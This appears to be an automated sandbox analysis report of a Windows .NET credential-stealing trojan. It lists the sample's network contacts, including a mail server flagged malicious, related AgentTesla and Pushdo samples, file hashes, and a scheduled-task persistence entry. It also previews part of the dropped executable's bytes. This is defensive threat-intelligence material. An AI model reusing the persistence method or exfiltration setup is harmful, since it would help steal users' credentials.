C:\Users\user\AppData\Roaming\joUXSCpr.exe | 37% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
https://api.ipify.org | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
http://r3.o.lencr.org0 | 0% | URL Reputation | safe
https://api.ipify.org/t | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
http://r3.i.lencr.org/0 | 0% | URL Reputation | safe
https://t3.ftcdn.net/jpg/02/48/42/64/360_F_248426448_NVKLywWqArG2ADUxDq6QprtIzsF82dMF.jpgG | 0% | Avira URL Cloud | safe
http://mail.stilbo.eu | 0% | Avira URL Cloud | safe
http://crl.mS | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.stilbo.eu | 212.44.102.65 | true | true | | unknown
api.ipify.org | 104.26.13.205 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.mS | RegSvcs.exe, 00000008.00000002.1477888050.0000000006510000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mail.stilbo.eu | RegSvcs.exe, 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://r3.o.lencr.org0 | RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t3.ftcdn.net/jpg/02/48/42/64/360_F_248426448_NVKLywWqArG2ADUxDq6QprtIzsF82dMF.jpgG | SMBKT-20242005.exe, joUXSCpr.exe.1.dr | false | Avira URL Cloud: safe | unknown
https://api.ipify.org/t | RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SMBKT-20242005.exe, 00000001.00000002.1461356615.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, joUXSCpr.exe, 00000009.00000002.1492085386.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | SMBKT-20242005.exe, joUXSCpr.exe.1.dr | false | URL Reputation: safe | unknown
http://r3.i.lencr.org/0 | RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

Legend (share of contacted IPs per country):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
212.44.102.65 | mail.stilbo.eu | Slovenia | 43128 | DHH-ASSI | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1444949
Start date and time: 2024-05-21 13:44:24 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SMBKT-20242005.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@22/11@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 313
• Number of non-executed functions: 29
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: SMBKT-20242005.exe
Time | Type | Description
07:45:28 | API Interceptor | 1x Sleep call for process: SMBKT-20242005.exe modified
07:45:29 | API Interceptor | 13x Sleep call for process: powershell.exe modified
07:45:31 | API Interceptor | 1x Sleep call for process: joUXSCpr.exe modified
07:45:31 | API Interceptor | 40x Sleep call for process: RegSvcs.exe modified
12:45:30 | Task Scheduler | Run new task: joUXSCpr path: C:\Users\user\AppData\Roaming\joUXSCpr.exe
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        104.26.13.205ReturnLegend.exeGet hashmaliciousStealitBrowse
                        • api.ipify.org/?format=json
                        SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                        • api.ipify.org/
                        Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                        • api.ipify.org/?format=json
                        ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                        • api.ipify.org/?format=json
                        Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/?format=json
                        E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                        • api.ipify.org/
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        api.ipify.orgIMG1024785000.exeGet hashmaliciousNanocore, AgentTesla, PureLog StealerBrowse
                        • 104.26.12.205
                        SecuriteInfo.com.Win32.PWSX-gen.15208.17708.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205
                        59c4c7e95c9549234661cc0c3a33de39958df413f3a408f3385e69fd669228fb_payload.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        Invoice KIK-1 P234478.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        Aluminium_Oxide00980000.pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        RFQ11045.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        hesaphareketi-01.pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205
                        hesaphareketi-01-5202024.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        garanti odeme200524.scr.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                        • 172.67.74.152
                        4289397_SEA SHIPMENT.exeGet hashmaliciousAgentTeslaBrowse
                        • 172.67.74.152
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
CLOUDFLARENETUS | SecuriteInfo.com.Win32.PWSX-gen.6793.10953.exe | Get hash | malicious | FormBook | Browse | 104.21.81.34
 | https://dukeenergyltd.top/bles.scr | Get hash | malicious | HTMLPhisher | Browse | 188.114.97.3
 | https://dukeenergyltd.top/bles.scr | Get hash | malicious | HTMLPhisher | Browse | 188.114.96.3
 | https://paperpile.com/app/p/972481aa-2f27-046e-8d74-eeebacfe6b15 | Get hash | malicious | HTMLPhisher | Browse | 1.1.1.1
 | https://cleanuri.com/YyQLEn | Get hash | malicious | Unknown | Browse | 188.114.97.3
 | http://johnleewis.com | Get hash | malicious | Unknown | Browse | 188.114.96.3
 | http://aizhantagaeva.github.io/netflix | Get hash | malicious | Unknown | Browse | 172.64.155.119
 | https://ipfs.io/ipfs/bafkreiaifz4xo7tqmc7x3hbuqb4wsvlnyylklzgwnldgkszguv3ly2jdoy#YOUREMAIL | Get hash | malicious | Unknown | Browse | 104.17.25.14
 | http://cf-ipfs.com/ipfs/Qmb8ZxH6YcdjvixfVo3yE3hHm5CNzVAQFSfFDavjywVtYk/gttrindeed.html | Get hash | malicious | Unknown | Browse | 104.17.64.14
 | http://cf-ipfs.com/ipfs/QmPkxJED3Fb2sHpjZ1QyjFuAuuktBdWCsvty9NVB5gE4bD/mail_delivery_pil1904.html | Get hash | malicious | Unknown | Browse | 104.17.25.14
DHH-ASSI | a5hbkmGD7N.exe | Get hash | malicious | Pushdo | Browse | 212.44.102.75
 | G7DyaA9iz9.exe | Get hash | malicious | Pushdo | Browse | 212.44.102.75
 | x607DB0i08.exe | Get hash | malicious | Pushdo | Browse | 212.44.102.75
 | x7RlIzQDk1.exe | Get hash | malicious | Unknown | Browse | 212.44.102.75
 | EwK95WVtzI.exe | Get hash | malicious | Pushdo | Browse | 212.44.102.75
 | OWd39WUX3D.exe | Get hash | malicious | Pushdo | Browse | 212.44.102.75
 | demand_rpkb_060923.exe | Get hash | malicious | GuLoader | Browse | 212.44.101.105
 | CX17SY6xF6.exe | Get hash | malicious | Pushdo | Browse | 212.44.102.57
 | PIyT9A3jfC.exe | Get hash | malicious | Pushdo | Browse | 212.44.102.57
 | nhVJ8J5qOt.exe | Get hash | malicious | Pushdo | Browse | 212.44.102.57
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | IMG1024785000.exe | Get hash | malicious | Nanocore, AgentTesla, PureLog Stealer | Browse | 104.26.13.205
 | http://shaifansar1.github.io/Netflix-Landing-Page | Get hash | malicious | Unknown | Browse | 104.26.13.205
 | http://rishavcoder.github.io/clone-discord | Get hash | malicious | Unknown | Browse | 104.26.13.205
 | http://attyahoonewworker-white-art-e0ce.danelle268.workers.dev/ | Get hash | malicious | HTMLPhisher | Browse | 104.26.13.205
 | https://url2.mailanyone.net/scanner?m=1s6pTH-0000Fr-6D&d=4%7Cmail%2F90%2F1715682600%2F1s6pTH-0000Fr-6D%7Cin2f%7C57e1b682%7C28613012%7C14303582%7C66433DF3D46FD0B9149B37AF26642EB9&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105dab%2Fc%2FQn7UrkNU_s_0P8LqAhGaAAIAeQtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2ap52eopnFrbnmoleduudmsle2co%25t.2w522%252%25Fpi2C%25eedr2Rnpct%25iosOtB3222%257%25%25AA225u%253n%25222ll%25%2521%25Cl322%25nul%25Ai77De%26dg%25DwQst2aF%25%3Db6fBkf2LXU3hwBIL4xHiGTWDIqObb0zE5ov3Ct%25VGteD%26ereVsc5ors7%3Da8indb59bd247b4ba3633fb4ee51eb8d&s=9OHmoQ0JkwbsHuMKJ_DcFrbob0A | Get hash | malicious | Unknown | Browse | 104.26.13.205
 | SecuriteInfo.com.Win32.PWSX-gen.15208.17708.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
 | 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe | Get hash | malicious | GuLoader, XWorm | Browse | 104.26.13.205
 | 59c4c7e95c9549234661cc0c3a33de39958df413f3a408f3385e69fd669228fb_payload.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
 | Invoice KIK-1 P234478.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
 | Aluminium_Oxide00980000.pdf.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
                        No context
                        Process:C:\Users\user\Desktop\SMBKT-20242005.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                        Process:C:\Users\user\AppData\Roaming\joUXSCpr.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2232
                        Entropy (8bit):5.379401388151058
                        Encrypted:false
                        SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//YPUyus:fLHxvIIwLgZ2KRHWLOugQs
                        MD5:254E3634833B07F95061588B960F3D96
                        SHA1:10F786DD15EBD4FD93687219D109B0E2F8499010
                        SHA-256:A3C6A2952F11C3EEDF8D48AEC01FD3B12723526899714272D02FB20A6A3C76E0
                        SHA-512:78B9B4BE082863EAB414C444CB5A2CCCA0C81A0176D743D578EADE9A7321AD65A3083FE3416C3428BC7B757E76427D543AB18617B19811CCC17C78ACDC126B1E
                        Malicious:false
                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\AppData\Roaming\joUXSCpr.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1567
                        Entropy (8bit):5.086590633524768
                        Encrypted:false
                        SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTew7v:HeLwYrFdOFzOz6dKrsuqI
                        MD5:3218A76B9A06204A3AF2D447B8C2AA3D
                        SHA1:256B34D68DD884BEED8C089D72F3A1F9984DF78E
                        SHA-256:5D536F1A22FDD7C4E9F5AEDCBA1BB02AE0B02ED617758670B312A37FA03C3C1B
                        SHA-512:619E60F3DA5BB90EFDAC21609FF0CB49B19418CC11791B990F48D3393B4C18C17325AF5DE411116A761BE323F160BBE85D2D5B3D848478CEE4CDCE8A524E1364
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                        Process:C:\Users\user\Desktop\SMBKT-20242005.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1567
                        Entropy (8bit):5.086590633524768
                        Encrypted:false
                        SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTew7v:HeLwYrFdOFzOz6dKrsuqI
                        MD5:3218A76B9A06204A3AF2D447B8C2AA3D
                        SHA1:256B34D68DD884BEED8C089D72F3A1F9984DF78E
                        SHA-256:5D536F1A22FDD7C4E9F5AEDCBA1BB02AE0B02ED617758670B312A37FA03C3C1B
                        SHA-512:619E60F3DA5BB90EFDAC21609FF0CB49B19418CC11791B990F48D3393B4C18C17325AF5DE411116A761BE323F160BBE85D2D5B3D848478CEE4CDCE8A524E1364
                        Malicious:true
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                        Process:C:\Users\user\Desktop\SMBKT-20242005.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):751112
                        Entropy (8bit):7.951191991023997
                        Encrypted:false
                        SSDEEP:12288:q3nKIhswVenAJnEorRImS5INcHSXh6+QrDpLh/xWBdEhApcVXf2kR:4nKLmeYBWGcHMgFhZWBnsV
                        MD5:52CD4C12A51D55526CEAA5F1E7F9E549
                        SHA1:6CA86A42D595177B554B82B5EA3A8DD40D1C3280
                        SHA-256:C501EBCF488C9172EF490E70C37ADB5926783F3AAC132E8FF58F90B6B3232E03
                        SHA-512:285B4BE0A187E86316B0335E5B587DFFB23B77952AFEF1F48A879B567E602A6ABBADA2C7CD65A02F4AFB2F532E2912B446849255B9D2E70448AB6E0CC5CEFFE4
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 37%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Kf.................6...........U... ........@.. ....................................@..................................T..W....`...............@...6........................................................... ............... ..H............text...$5... ...6.................. ..`.rsrc........`.......8..............@..@.reloc...............>..............@..B.................U......H.......d...`O......(....................................................0..A....... .........%.E...(.....F... *........%.-...(.........(W...*.....&*...^..}.....(.......(.....*.0..........~F....~........E........d...d...................+.....(......{....o....r...po....&..!. {...Y.+..{....o....r...po....&.{....o....r...po....&. ......8v....{....o....r)..po....&.{....o....r=..po....&. ..... ....Y.87....{.....o......{.....o.......8.....{.....o.....*...0..........~.......sl....+.
                        Process:C:\Users\user\Desktop\SMBKT-20242005.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:false
                        Preview:[ZoneTransfer]....ZoneId=0
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.951191991023997
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
